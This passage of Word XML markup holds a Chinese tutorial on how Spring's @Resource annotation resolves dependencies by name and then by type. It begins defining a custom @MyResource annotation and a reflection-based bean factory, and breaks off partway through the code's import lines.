          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>一、</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>@Resource</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>注解原理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00134F57" w:rsidRPr="00134F57" w:rsidRDefault="00134F57" w:rsidP="00134F57">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:after="180" w:line="370" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>@Resource</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>可以标注在字段或属性的</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>setter</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>方法上</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00134F57" w:rsidRPr="00134F57" w:rsidRDefault="00134F57" w:rsidP="00134F57">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:after="180" w:line="370" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1.  </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>如果指定了</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>属性</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>那么就按</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>属性的名称装配</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00134F57" w:rsidRPr="00134F57" w:rsidRDefault="00134F57" w:rsidP="00134F57">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:after="180" w:line="370" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>如果没有指定</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>属性</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>那就按照默认的名称查找依赖对象</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00134F57" w:rsidRPr="00134F57" w:rsidRDefault="00134F57" w:rsidP="00134F57">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:after="180" w:line="370" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>如果按默认名称查找不到依赖对象</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>那么</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>@Resource</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>注解就会回退到按类型装配</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00134F57" w:rsidRPr="00134F57" w:rsidRDefault="00134F57" w:rsidP="00134F57">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:after="180" w:line="370" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>①</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>先写一个自己的</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>@MyResource:</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b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> java.lang.annotation.Retention;</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b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> java.lang.annotation.RetentionPolicy;</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b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> java.lang.annotation.Target;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b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> java.lang.annotation.ElementType;</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@Retention</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">(RetentionPolicy.RUNTIME) </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>指定注解保留的范围</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>运行期</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz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@Target</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">({ ElementType.FIELD, ElementType.METHOD }) </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>允许注解标注的位置</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>属性</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz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b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>@interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> MyResource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public</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> String name() </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="DD1144"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>""</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>提供</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>属性</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szCs w:val="16"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00134F57" w:rsidRPr="00134F57" w:rsidRDefault="00134F57" w:rsidP="00134F57">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>②</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t xml:space="preserve"> Spring Bean Factory: ClassPathXMLApplicationContext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b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> java.beans.Introspector;</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b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> java.beans.PropertyDescriptor;</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b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> java.lang.reflect.Field;</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b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
